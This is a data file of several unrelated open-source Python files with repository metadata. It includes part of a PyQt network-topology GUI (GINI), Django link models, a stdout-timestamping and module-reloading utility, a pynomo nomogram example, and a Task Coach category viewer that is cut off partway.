s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
def discover(self):
"""
Add yRouters within range of topology
"""
if self.wgini_client is None:
self.log.append("You must connect to the wireless server before you can discover any new devices!")
if not self.startWGINIClient():
return
if self.isRunning() and not self.recovery:
self.log.append("A topology is currently running, please stop it before discovering any new devices!")
return
if isinstance(mainWidgets["canvas"],Tutorial):
self.log.append("You cannot discover any new devices during this tutorial!")
return
if not self.client or not self.client.isConnected():
self.startClient()
self.popup.setWindowTitle("yRouter discovery")
tempList=self.wgini_client.Check()
scene=self.canvas.scene()
removed = 0
for yid, yun in usedyRouters.iteritems():
if (yun not in tempList) or (yun in tempList and ((yun['MaxWlan'] - yun['CurrWlan']) == 0)):
self.popup.setText("yRouter_%d is no longer available. It will be removed from the topology." %yid)
self.popup.show()
yRouter=scene.findItem(self.device_type + "_%d" %yid)
yRouter.delete()
del usedyRouters[yid]
removed += 1
found=0
updated=0
for yun in tempList:
openYun = yun['MaxWlan'] - yun['CurrWlan']
if ((yun['MaxWlan'] - yun['CurrWlan']) == 0):
if yun['ID'] in usedyRouters.keys():
self.popup.setText("yRouter_%d is no longer available. It will be removed from the topology." %yun['ID'])
self.popup.show()
yRouter = scene.findItem(self.device_type + "_%d" %yun['ID'])
yRouter.delete()
del usedyRouters[yun['ID']]
removed += 1
else:
continue
elif (yun['ID'] not in yRouters.keys()):
yRouters[yun['ID']] = yun
availableyRouters.append(yun)
found += 1
else:
if not yRouters[yun['ID']] == yun:
yRouters[yun['ID']] = yun
yRouter = (y for y in availableyRouters if y['ID'] == yun['ID'])
availableyRouters.remove(yRouter)
availableyRouters.append(yun)
updated +=1
availableyRouters.sort(key=lambda YunEntity: YunEntity['ID'])
if found == 0 and updated == 0 and removed == 0:
text = "No yRouters found, updated, or removed."
else:
if found == 0:
text = "No yRouters found, "
else:
text = "%d yRouters found, " %found
if updated == 0:
text += "no yRouters updated, "
else:
text += "%d yRouters updated, " %updated
if removed == 0:
text += "no yRouters removed."
else:
text += "%d yRouters removed." %removed
if mainWidgets["drop"].commonDropArea.yRouterDrop is not None:
mainWidgets["drop"].commonDropArea.yRouterDrop.update()
if mainWidgets["drop"].netDropArea.yRouterDrop is not None:
mainWidgets["drop"].netDropArea.yRouterDrop.update()
self.log.append(text)
def arrange(self):
"""
Rearrange the topology based on the distance between nodes.
"""
if self.isRunning():
self.log.append("Cannot arrange while running!")
return
if isinstance(mainWidgets["canvas"], Tutorial):
mainWidgets["log"].append("Cannot arrange during the tutorial!")
return
options["elasticMode"] = not options["elasticMode"]
def about(self):
"""
Show the about window.
"""
QtGui.QMessageBox.about(self,
self.tr("About %s %s"
% (Core.globals.PROG_NAME,
Core.globals.PROG_VERSION)),
self.tr("<b>%s %s</b><br>Written by Daniel Ng<br>under the supervision of Muthucumaru Maheswaran"
% (Core.globals.PROG_NAME,
Core.globals.PROG_VERSION)))
def createActions(self):
"""
Create the actions used in the menus and toolbars.
"""
self.newSceneAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "new.png"), self.tr("&New"), self)
self.newSceneAct.setShortcut(self.tr("Ctrl+N"))
self.newSceneAct.setStatusTip(self.tr("Create a new topology"))
self.connect(self.newSceneAct, QtCore.SIGNAL("triggered()"), self.newScene)
self.closeAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "close.png"), self.tr("&Close"), self)
self.closeAct.setShortcut(self.tr("Ctrl+W"))
self.closeAct.setStatusTip(self.tr("Close the current topology"))
self.connect(self.closeAct, QtCore.SIGNAL("triggered()"), self.closeTopology)
self.loadAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "open.png"), self.tr("&Open..."), self)
self.loadAct.setShortcut(self.tr("Ctrl+O"))
self.loadAct.setStatusTip(self.tr("Load a topology"))
self.connect(self.loadAct, QtCore.SIGNAL("triggered()"), self.loadTopology)
self.saveAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "save.png"), self.tr("&Save..."), self)
self.saveAct.setShortcut(self.tr("Ctrl+S"))
self.saveAct.setStatusTip(self.tr("Save the current topology"))
self.connect(self.saveAct, QtCore.SIGNAL("triggered()"), self.saveTopology)
self.saveAsAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "save.png"), self.tr("&Save As..."), self)
self.saveAsAct.setShortcut(self.tr("Ctrl+Shift+S"))
self.saveAsAct.setStatusTip(self.tr("Save the current topology under a given filename"))
self.connect(self.saveAsAct, QtCore.SIGNAL("triggered()"), self.saveTopologyAs)
self.sendFileAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "send.png"), self.tr("&Send File..."), self)
self.sendFileAct.setShortcut(self.tr("Ctrl+F"))
self.sendFileAct.setStatusTip(self.tr("Choose a file to send to the server"))
self.connect(self.sendFileAct, QtCore.SIGNAL("triggered()"), self.sendFile)
self.exportAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "export.png"), self.tr("&Export..."), self)
self.exportAct.setShortcut(self.tr("Ctrl+P"))
self.exportAct.setStatusTip(self.tr("Export the current topology as an image"))
self.connect(self.exportAct, QtCore.SIGNAL("triggered()"), self.export)
self.copyAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "copy.png"), self.tr("&Copy"), self)
self.copyAct.setShortcut(self.tr("Ctrl+C"))
self.copyAct.setStatusTip(self.tr("Copy the selected text"))
self.connect(self.copyAct, QtCore.SIGNAL("triggered()"), self.copy)
self.startWGINIClientAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "startClient.png"), self.tr("&Start WGINI Client"), self)
self.startWGINIClientAct.setShortcut(self.tr("Ctrl+W"))
self.startWGINIClientAct.setStatusTip(self.tr("Start wireless GINI client"))
self.connect(self.startWGINIClientAct, QtCore.SIGNAL("triggered()"), self.startWGINIClient)
self.discoverAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "discover.png"), self.tr("&Discover"), self)
self.discoverAct.setShortcut(self.tr("Ctrl+Shift+Y"))
self.discoverAct.setStatusTip(self.tr("Discover nearby yRouters"))
self.connect(self.discoverAct, QtCore.SIGNAL("triggered()"), self.discover)
self.compileAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "compile.png"), self.tr("&Compile"), self)
self.compileAct.setShortcut(self.tr("Ctrl+E"))
self.compileAct.setStatusTip(self.tr("Compile the current topology"))
self.connect(self.compileAct, QtCore.SIGNAL("triggered()"), self.compile)
self.runAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "run.png"), self.tr("&Run"), self)
self.runAct.setShortcut(self.tr("Ctrl+R"))
self.runAct.setStatusTip(self.tr("Run the current topology"))
self.connect(self.runAct, QtCore.SIGNAL("triggered()"), self.run)
self.stopAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "stop.png"), self.tr("&Stop"), self)
self.stopAct.setShortcut(self.tr("Ctrl+D"))
self.stopAct.setStatusTip(self.tr("Stop the current topology"))
self.connect(self.stopAct, QtCore.SIGNAL("triggered()"), self.stop)
self.startServerAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "startServer.png"), self.tr("&Start Server"), self)
self.startServerAct.setShortcut(self.tr("Ctrl+T"))
self.startServerAct.setStatusTip(self.tr("Start the server"))
self.connect(self.startServerAct, QtCore.SIGNAL("triggered()"), self.startBackend)
self.startwServerAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "startServer.png"), self.tr("&Start WGINI Server"), self)
self.startwServerAct.setShortcut(self.tr("Ctrl+W"))
self.startwServerAct.setStatusTip(self.tr("Start the WGINI server"))
self.connect(self.startwServerAct, QtCore.SIGNAL("triggered()"), self.startWServer)
self.optionsAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "options.png"), self.tr("&Options"), self)
self.optionsAct.setShortcut(self.tr("F2"))
self.optionsAct.setStatusTip(self.tr("Show the options window"))
self.connect(self.optionsAct, QtCore.SIGNAL("triggered()"), self.config)
self.arrangeAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "arrange.png"), self.tr("&Arrange"), self)
self.arrangeAct.setShortcut(self.tr("Ctrl+A"))
self.arrangeAct.setStatusTip(self.tr("Arranges the current topology"))
self.connect(self.arrangeAct, QtCore.SIGNAL("triggered()"), self.arrange)
self.resetLayoutAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "layout.png"), self.tr("Reset Layout"), self)
self.resetLayoutAct.setStatusTip(self.tr("Reset dock windows to the saved layout"))
self.connect(self.resetLayoutAct, QtCore.SIGNAL("triggered()"), self.resetLayout)
self.expandSceneAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "expand.png"), self.tr("Expand Scene"), self)
self.expandSceneAct.setStatusTip(self.tr("Expand the scene for more space"))
self.connect(self.expandSceneAct, QtCore.SIGNAL("triggered()"), self.expandScene)
self.quitAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "exit.png"), self.tr("&Quit"), self)
self.quitAct.setShortcut(self.tr("Ctrl+Q"))
self.quitAct.setStatusTip(self.tr("Quit the application"))
self.connect(self.quitAct, QtCore.SIGNAL("triggered()"), self.quit)
self.newProjectAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "new.png"), self.tr("&New"), self)
self.newProjectAct.setShortcut(self.tr("Ctrl+Shift+N"))
self.newProjectAct.setStatusTip(self.tr("Create a new project"))
self.connect(self.newProjectAct, QtCore.SIGNAL("triggered()"), self.newProject)
self.openProjectAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "open.png"), self.tr("&Open"), self)
self.openProjectAct.setShortcut(self.tr("Ctrl+Shift+O"))
self.openProjectAct.setStatusTip(self.tr("Open an existing project"))
self.connect(self.openProjectAct, QtCore.SIGNAL("triggered()"), self.openProject)
self.closeProjectAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "close.png"), self.tr("&Close"), self)
self.closeProjectAct.setShortcut(self.tr("Ctrl+Shift+W"))
self.closeProjectAct.setStatusTip(self.tr("Close the current project"))
self.connect(self.closeProjectAct, QtCore.SIGNAL("triggered()"), self.closeProject)
self.tutorialAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "tutorial.png"), self.tr("&Tutorial"), self)
self.connect(self.tutorialAct, QtCore.SIGNAL("triggered()"), self.startTutorial)
self.faqAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "help.png"), self.tr("&FAQ"), self)
self.connect(self.faqAct, QtCore.SIGNAL("triggered()"), self.faq)
self.aboutAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "giniLogo.png"), self.tr("&About"), self)
self.aboutAct.setStatusTip(self.tr("Show the application's About box"))
self.connect(self.aboutAct, QtCore.SIGNAL("triggered()"), self.about)
self.aboutQtAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "Qt-logo.png"), self.tr("About &Qt"), self)
self.aboutQtAct.setStatusTip(self.tr("Show the Qt library's About box"))
self.connect(self.aboutQtAct, QtCore.SIGNAL("triggered()"),
QtGui.qApp, QtCore.SLOT("aboutQt()"))
def createMenus(self):
"""
Create the menus with actions.
"""
self.fileMenu = self.menuBar().addMenu(self.tr("&File"))
self.fileMenu.setPalette(defaultOptions["palette"])
self.fileMenu.addAction(self.newSceneAct)
self.fileMenu.addAction(self.loadAct)
self.fileMenu.addAction(self.saveAct)
self.fileMenu.addAction(self.saveAsAct)
self.fileMenu.addAction(self.sendFileAct)
self.fileMenu.addAction(self.exportAct)
self.fileMenu.addAction(self.closeAct)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.quitAct)
self.projectMenu = self.menuBar().addMenu(self.tr("&Project"))
self.projectMenu.setPalette(defaultOptions["palette"])
self.projectMenu.addAction(self.newProjectAct)
self.projectMenu.addAction(self.openProjectAct)
self.projectMenu.addAction(self.closeProjectAct)
self.editMenu = self.menuBar().addMenu(self.tr("&Edit"))
self.editMenu.setPalette(defaultOptions["palette"])
self.editMenu.addAction(self.copyAct)
self.editMenu.addAction(self.arrangeAct)
self.editMenu.addAction(self.resetLayoutAct)
self.editMenu.addAction(self.expandSceneAct)
self.runMenu = self.menuBar().addMenu(self.tr("&Run"))
self.runMenu.setPalette(defaultOptions["palette"])
self.runMenu.addAction(self.startWGINIClientAct)
self.runMenu.addAction(self.discoverAct)
self.runMenu.addAction(self.compileAct)
self.runMenu.addAction(self.runAct)
self.runMenu.addAction(self.stopAct)
self.runMenu.addAction(self.startServerAct)
self.runMenu.addAction(self.startwServerAct)
self.configMenu = self.menuBar().addMenu(self.tr("&Config"))
self.configMenu.setPalette(defaultOptions["palette"])
self.configMenu.addAction(self.optionsAct)
self.menuBar().addSeparator()
self.helpMenu = self.menuBar().addMenu(self.tr("&Help"))
self.helpMenu.setPalette(defaultOptions["palette"])
self.helpMenu.addAction(self.tutorialAct)
self.helpMenu.addAction(self.faqAct)
self.helpMenu.addAction(self.aboutAct)
self.helpMenu.addAction(self.aboutQtAct)
def createPopupMenu(self):
"""
Customize the popup menu so that it is visible.
"""
popupMenu = QtGui.QMainWindow.createPopupMenu(self)
popupMenu.setPalette(defaultOptions["palette"])
return popupMenu
def createToolBars(self):
"""
Create the toolbars with actions.
"""
self.fileToolBar = self.addToolBar(self.tr("File"))
self.fileToolBar.addAction(self.newSceneAct)
self.fileToolBar.addAction(self.loadAct)
self.fileToolBar.addAction(self.saveAct)
self.fileToolBar.addAction(self.sendFileAct)
self.fileToolBar.addAction(self.exportAct)
self.fileToolBar.addAction(self.closeAct)
self.editToolBar = self.addToolBar(self.tr("Edit"))
self.editToolBar.addAction(self.copyAct)
self.editToolBar.addAction(self.resetLayoutAct)
self.editToolBar.addAction(self.expandSceneAct)
self.runToolBar = self.addToolBar(self.tr("Run"))
self.runToolBar.addAction(self.startServerAct)
self.runToolBar.addAction(self.discoverAct)
self.runToolBar.addAction(self.compileAct)
self.runToolBar.addAction(self.runAct)
self.runToolBar.addAction(self.stopAct)
self.runToolBar.addAction(self.startWGINIClientAct)
self.runToolBar.addAction(self.startwServerAct)
def createStatusBar(self):
"""
Create the status bar.
"""
self.statusBar().showMessage(self.tr("Ready"))
def createProgressBar(self):
"""
Create the progress bar.
"""
self.progressBar = QtGui.QProgressBar()
self.progressBar.setRange(0, 10000)
self.progressBar.setValue(0)
self.statusBar().addPermanentWidget(self.progressBar)
self.progressBar.show()
def getDeviceCount(self, alive=False):
"""
Return the interfaceable device count, or the alive ones if alive=True.
"""
from Core.Interfaceable import Interfaceable
count = 0.0
for item in self.canvas.scene().items():
if isinstance(item, Interfaceable):
if item.device_type != "REALM":
if alive and item.status in ("", "dead"):
continue
count += 1.0
return count
def updateProgressBar(self):
"""
Update the progress bar.
"""
maxVal = self.progressBar.maximum()
finalVal = (self.getDeviceCount(True) / self.getDeviceCount()) * maxVal
if finalVal < 0:
finalVal = 0
self.progressBar.setValue(finalVal)
if finalVal == 0:
return True
return False
def createConfigWindows(self):
"""
Create the options window.
"""
self.configWindow = ConfigDialog(self)
def createDockWindows(self):
"""
Create the dock windows: dropbar, log, properties, interfaces, routes.
"""
self.log = LogWindow(self.tr("Log"), self)
self.log.append("Welcome to %s %s!\n"
% (Core.globals.PROG_NAME, Core.globals.PROG_VERSION))
self.log.append("To open an existing topology, please click the 'Open' icon from the tray above canvas!")
self.log.setGeometry(QtCore.QRect(0, 0, 800, 114))
mainWidgets["log"] = self.log
self.dropbar = DropBar(self.tr("Components"), self)
self.dropbar.setGeometry(QtCore.QRect(0, 0, 129, 390))
mainWidgets["drop"] = self.dropbar
self.properties = PropertiesWindow(self)
self.properties.setWindowTitle("Properties")
mainWidgets["properties"] = self.properties
self.interfaces = InterfacesWindow(self)
self.interfaces.setWindowTitle("Interfaces")
mainWidgets["interfaces"] = self.interfaces
self.routes = RoutesWindow(self.interfaces, self)
self.routes.setWindowTitle("Routes")
mainWidgets["routes"] = self.routes
self.tm = TaskManagerWindow(self)
self.tm.setWindowTitle("Task Manager")
mainWidgets["tm"] = self.tm
self.debugWindow = QtGui.QDockWidget(self.tr("Debug Window"))
self.debugWindow.setWidget(DebugWindow(self))
self.docks = {"Components":self.dropbar, "Log":self.log, "Properties":self.properties, "Interfaces":self.interfaces, "Routes":self.routes, "Task Manager":self.tm}
self.addDockWidget(QtCore.Qt.LeftDockWidgetArea, self.dropbar)
self.addDockWidget(QtCore.Qt.BottomDockWidgetArea, self.log)
self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.properties)
self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.interfaces)
self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.routes)
self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.tm)
self.tm.setFloating(True)
self.routes.setFloating(True)
self.debugWindow.setFloating(True)
def createPopupWindows(self):
"""
Create the different popup windows.
"""
self.exportWindow = ExportWindow(self)
self.sendWindow = SendDirectoryWindow(self)
self.popup = QtGui.QMessageBox(self)
self.popup.setIcon(QtGui.QMessageBox.Warning)
self.popup.setWindowIcon(QtGui.QIcon(environ["images"]+"giniLogo.png"))
mainWidgets["popup"] = self.popup
# specific dialog for client IP and port input
self.inputDialog = QtGui.QInputDialog(self)
self.inputDialog.setWindowIcon(QtGui.QIcon(environ["images"]+"giniLogo.png"))
mainWidgets["dialog"] = self.inputDialog
def keyPressEvent(self, event):
"""
Handle specific shortcut keys.
"""
key = event.key()
scene = self.canvas.scene()
if key == QtCore.Qt.Key_Escape:
scene.clearSelection()
elif key == QtCore.Qt.Key_Delete:
for item in scene.selectedItems():
item.delete()
elif key == QtCore.Qt.Key_C:
items = scene.items()
if not items:
return
selected = scene.selectedItems()
scene.clearSelection()
if selected:
index = items.index(selected[0])
items[index - 1].setSelected(True)
else:
items[0].setSelected(True)
elif key == QtCore.Qt.Key_H:
for dock in self.docks.values():
dock.setFloating(not dock.isFloating())
elif key == QtCore.Qt.Key_F10:
self.debugWindow.show()
def cleanup(self):
if self.server != None:
self.server.kill()
class DebugWindow(QtGui.QWidget):
def __init__(self, parent):
QtGui.QWidget.__init__(self)
self.parent = parent
self.layout = QtGui.QVBoxLayout()
#self.list = QtGui.QListWidget()
self.button = QtGui.QPushButton("Execute")
self.lineedit = QtGui.QLineEdit()
#self.layout.addWidget(self.list)
self.layout.addWidget(self.lineedit)
self.layout.addWidget(self.button)
self.setLayout(self.layout)
self.windows = {}
for key, val in mainWidgets.iteritems():
if key != "app" and key != "client" and val != None:
self.windows[key] = val
self.connect(self.button, QtCore.SIGNAL("clicked()"), self.execute)
def fill(self):
scene = mainWidgets["canvas"].scene()
for i in range(125):
scene.addItem(UML())
def execute(self):
canvas = mainWidgets["canvas"]
scene = canvas.scene()
#self.list.clear()
#for item in scene.items():
# try:
# self.list.addItem(item.getName() + "(%d,%d)" % (item.pos().x(), item.pos().y()))
# except:
# pass
#for name, window in self.windows.iteritems():
# self.list.addItem(name + ":" + str(window.geometry()))
text = str(self.lineedit.text())
if text:
lines = text.split(";")
for line in lines:
print eval(line)
if isinstance(canvas, Tutorial):
canvas.next()
|
mit
| 2,184,146,233,005,499,600
| 36.032797
| 248
| 0.561083
| false
| 4.235854
| false
| false
| false
|
daonb/django-oklinks
|
oklinks/models.py
|
1
|
1797
|
import os
from django.db import models
from django.contrib.contenttypes import generic
from django.contrib.contenttypes.models import ContentType
from django.utils.translation import ugettext_lazy as _
from django.core.files.storage import FileSystemStorage
from django.conf import settings
from managers import LinksManager, LinkTypeManager
class LinkType(models.Model):
title = models.CharField(max_length=200, verbose_name=_('title'))
image = models.ImageField(upload_to='icons')
objects = LinkTypeManager()
class Meta:
verbose_name = _('link type')
verbose_name_plural = _('link types')
def __unicode__(self):
return self.title
class Link(models.Model):
url = models.URLField(verbose_name='URL', max_length=1000,
verify_exists=False)
title = models.CharField(max_length=200, verbose_name=_('title'))
content_type = models.ForeignKey(ContentType,
verbose_name=_('content type'),
related_name="content_type_set_for_%(class)s")
object_pk = models.TextField(_('object ID'))
content_object = generic.GenericForeignKey(ct_field="content_type", fk_field="object_pk")
link_type = models.ForeignKey(LinkType, default=LinkTypeManager.default)
active = models.BooleanField(default=True)
objects = LinksManager()
class Meta:
verbose_name = _('link')
verbose_name_plural = _('links')
def __unicode__(self):
return "%s: %s" % (self.title, self.url)
class LinkedFile(models.Model):
link = models.ForeignKey(Link, null=True, blank=True, default=None)
sha1 = models.CharField(max_length=1000, null=True)
last_updated = models.DateTimeField(auto_now=True, null=True)
link_file = models.FileField(upload_to='link_files')
|
bsd-3-clause
| 1,131,894,914,825,749,500
| 35.673469
| 93
| 0.687257
| false
| 3.898048
| false
| false
| false
|
mavroskardia/ilovemymudder
|
mudder/src/common/utils.py
|
1
|
2484
|
import sys
import os
import shutil
import io
import datetime
import time
import importlib
import threading
class HijackedStdOut(io.TextIOWrapper):
def write(self, s):
if s == '\n':
super().write(s)
return
s = '{:%Y.%m.%d %H:%M:%S} => {}'.format(datetime.datetime.now(), s)
super().write(s)
self.flush()
class HijackedStdIn(io.TextIOWrapper):
pass
class HijackedStdInBuffer(io.BufferedRandom):
pass
def hijack_stdout():
sys.stdout = HijackedStdOut(buffer=sys.stdout.buffer)
def hijack_stdin():
sys.stdin = HijackedStdIn(buffer=HijackedStdInBuffer())
return sys.stdin
def clean():
dirs_to_remove = []
for path, dirs, files in os.walk(os.curdir):
if path.endswith('__pycache__'):
dirs_to_remove.append(path)
for d in dirs_to_remove:
print('cleaning', d)
shutil.rmtree(d)
class ModuleWatcher(object):
watched_files = []
def __init__(self, module, interval=2):
self.module = module
self.interval = interval
self.thread = threading.Thread(target=self.loop)
self.done = False
if module.__file__ in ModuleWatcher.watched_files:
raise Exception('This file is already being watched')
ModuleWatcher.watched_files.append(module.__file__)
def watch(self, action=None):
self.action = action
self.filename = self.module.__file__
self.t0 = os.stat(self.filename).st_mtime
self.thread.start()
def loop(self):
while not self.done:
dt = os.stat(self.filename).st_mtime
if dt != self.t0:
print('{} was modified, reloading...'.format(self.module))
importlib.reload(self.module)
self.t0 = dt
if self.action: self.action()
time.sleep(self.interval)
def stop(self):
self.done = True
self.thread.join()
def watch_and_reload(module):
print('watching module {} for changes'.format(module))
mw = ModuleWatcher(module)
mw.watch()
return mw
if __name__ == '__main__':
if sys.argv[1] == 'clean':
clean()
elif sys.argv[1] == 'watch':
mod = importlib.import_module('.test', package='src.common')
watch = watch_and_reload(mod)
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
watch.stop()
break
|
mit
| 892,111,590,700,638,300
| 23.84
| 75
| 0.579308
| false
| 3.690936
| false
| false
| false
|
lefakkomies/pynomo
|
examples/ex_type1_nomo_1.py
|
1
|
1854
|
"""
ex_type1_nomo_1.py
Simple nomogram of type 1: F1 + F2 + F3 = 0
Copyright (C) 2007-2009 Leif Roschier
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
sys.path.insert(0, "..")
# sys.path[:0] = [".."]
from pynomo.nomographer import Nomographer
N_params_1 = {
'u_min': 0.0,
'u_max': 10.0,
'function': lambda u: u,
'title': r'$u_1$',
'tick_levels': 2,
'tick_text_levels': 1,
}
N_params_2 = {
'u_min': 0.0,
'u_max': 10.0,
'function': lambda u: u,
'title': r'$u_2$',
'tick_levels': 2,
'tick_text_levels': 1,
}
N_params_3 = {
'u_min': 0.0,
'u_max': -10.0,
'function': lambda u: u,
'title': r'$u_3$',
'tick_levels': 2,
'tick_text_levels': 1,
}
block_1_params = {
'block_type': 'type_1',
'width': 10.0,
'height': 10.0,
'f1_params': N_params_1,
'f2_params': N_params_2,
'f3_params': N_params_3,
'isopleth_values': [[6, 2, 'x']],
}
main_params = {
'filename': 'ex_type1_nomo_1.pdf',
'paper_height': 10.0,
'paper_width': 10.0,
'block_params': [block_1_params],
'transformations': [('rotate', 0.01), ('scale paper',)],
'title_str': r'$u_1+u_2+u_3=0$',
'debug': False,
}
Nomographer(main_params)
|
gpl-3.0
| 1,613,223,115,143,167,700
| 24.39726
| 73
| 0.599784
| false
| 2.883359
| false
| false
| false
|
wdmchaft/taskcoach
|
taskcoachlib/gui/viewer/category.py
|
1
|
10590
|
# -*- coding: utf-8 -*-
'''
Task Coach - Your friendly task manager
Copyright (C) 2004-2010 Task Coach developers <developers@taskcoach.org>
Copyright (C) 2008 Rob McMullen <rob.mcmullen@gmail.com>
Copyright (C) 2008 Thomas Sonne Olesen <tpo@sonnet.dk>
Task Coach is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Task Coach is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import wx
from taskcoachlib import patterns, command, widgets
from taskcoachlib.domain import category
from taskcoachlib.i18n import _
from taskcoachlib.gui import uicommand, menu, dialog, render
import base, mixin
class BaseCategoryViewer(mixin.AttachmentDropTargetMixin,
mixin.SortableViewerForCategoriesMixin,
mixin.SearchableViewerMixin,
mixin.NoteColumnMixin, mixin.AttachmentColumnMixin,
base.SortableViewerWithColumns, base.TreeViewer):
SorterClass = category.CategorySorter
defaultTitle = _('Categories')
defaultBitmap = 'folder_blue_arrow_icon'
def __init__(self, *args, **kwargs):
kwargs.setdefault('settingsSection', 'categoryviewer')
super(BaseCategoryViewer, self).__init__(*args, **kwargs)
for eventType in (category.Category.subjectChangedEventType(),
category.Category.filterChangedEventType(),
category.Category.foregroundColorChangedEventType(),
category.Category.backgroundColorChangedEventType(),
category.Category.fontChangedEventType(),
category.Category.iconChangedEventType(),
category.Category.selectedIconChangedEventType(),
category.Category.exclusiveSubcategoriesChangedEventType()):
patterns.Publisher().registerObserver(self.onAttributeChanged,
eventType)
def onEveryMinute(self, event):
pass
def domainObjectsToView(self):
return self.taskFile.categories()
def curselectionIsInstanceOf(self, class_):
return class_ == category.Category
def createWidget(self):
imageList = self.createImageList() # Has side-effects
self._columns = self._createColumns()
itemPopupMenu = self.createCategoryPopupMenu()
columnPopupMenu = menu.ColumnPopupMenu(self)
self._popupMenus.extend([itemPopupMenu, columnPopupMenu])
widget = widgets.CheckTreeCtrl(self, self._columns,
self.onSelect, self.onCheck,
uicommand.CategoryEdit(viewer=self, categories=self.presentation()),
uicommand.CategoryDragAndDrop(viewer=self, categories=self.presentation()),
uicommand.EditSubject(viewer=self),
itemPopupMenu, columnPopupMenu,
**self.widgetCreationKeywordArguments())
widget.AssignImageList(imageList) # pylint: disable-msg=E1101
return widget
def createCategoryPopupMenu(self, localOnly=False):
return menu.CategoryPopupMenu(self.parent, self.settings, self.taskFile,
self, localOnly)
def _createColumns(self):
# pylint: disable-msg=W0142
kwargs = dict(renderDescriptionCallback=lambda category: category.description(),
resizeCallback=self.onResizeColumn)
columns = [widgets.Column('subject', _('Subject'),
category.Category.subjectChangedEventType(),
sortCallback=uicommand.ViewerSortByCommand(viewer=self,
value='subject'),
imageIndexCallback=self.subjectImageIndex,
width=self.getColumnWidth('subject'),
**kwargs),
widgets.Column('description', _('Description'),
category.Category.descriptionChangedEventType(),
sortCallback=uicommand.ViewerSortByCommand(viewer=self,
value='description'),
renderCallback=lambda category: category.description(),
width=self.getColumnWidth('description'),
**kwargs),
widgets.Column('attachments', '',
category.Category.attachmentsChangedEventType(), # pylint: disable-msg=E1101
width=self.getColumnWidth('attachments'),
alignment=wx.LIST_FORMAT_LEFT,
imageIndexCallback=self.attachmentImageIndex,
headerImageIndex=self.imageIndex['paperclip_icon'],
renderCallback=lambda category: '', **kwargs)]
if self.settings.getboolean('feature', 'notes'):
columns.append(widgets.Column('notes', '',
category.Category.notesChangedEventType(), # pylint: disable-msg=E1101
width=self.getColumnWidth('notes'),
alignment=wx.LIST_FORMAT_LEFT,
imageIndexCallback=self.noteImageIndex,
headerImageIndex=self.imageIndex['note_icon'],
renderCallback=lambda category: '', **kwargs))
return columns
def getImageIndices(self, category):
bitmap = category.icon(recursive=True)
bitmap_selected = category.selectedIcon(recursive=True) or bitmap
return self.imageIndex[bitmap] if bitmap else -1, self.imageIndex[bitmap_selected] if bitmap_selected else -1
def subjectImageIndex(self, category, which):
normalImageIndex, expandedImageIndex = self.getImageIndices(category)
expanded = which in [wx.TreeItemIcon_Expanded,
wx.TreeItemIcon_SelectedExpanded]
return expandedImageIndex if expanded else normalImageIndex
def createToolBarUICommands(self):
commands = super(BaseCategoryViewer, self).createToolBarUICommands()
commands[-2:-2] = [None,
uicommand.CategoryNew(categories=self.presentation(),
settings=self.settings),
uicommand.CategoryNewSubCategory(categories=self.presentation(),
viewer=self),
uicommand.CategoryEdit(categories=self.presentation(),
viewer=self),
uicommand.CategoryDelete(categories=self.presentation(),
viewer=self)]
return commands
def createColumnUICommands(self):
commands = [\
uicommand.ToggleAutoColumnResizing(viewer=self,
settings=self.settings),
None,
uicommand.ViewColumn(menuText=_('&Description'),
helpText=_('Show/hide description column'),
setting='description', viewer=self),
uicommand.ViewColumn(menuText=_('&Attachments'),
helpText=_('Show/hide attachments column'),
setting='attachments', viewer=self)]
if self.settings.getboolean('feature', 'notes'):
commands.append(uicommand.ViewColumn(menuText=_('&Notes'),
helpText=_('Show/hide notes column'),
setting='notes', viewer=self))
return commands
def onAttributeChanged(self, event):
if category.Category.exclusiveSubcategoriesChangedEventType() in event.types():
# We need to refresh the children of the changed item as well
# because they have to use radio buttons instead of checkboxes, or
# vice versa:
items = event.sources()
for item in items.copy():
items |= set(item.children())
self.widget.RefreshItems(*items)
else:
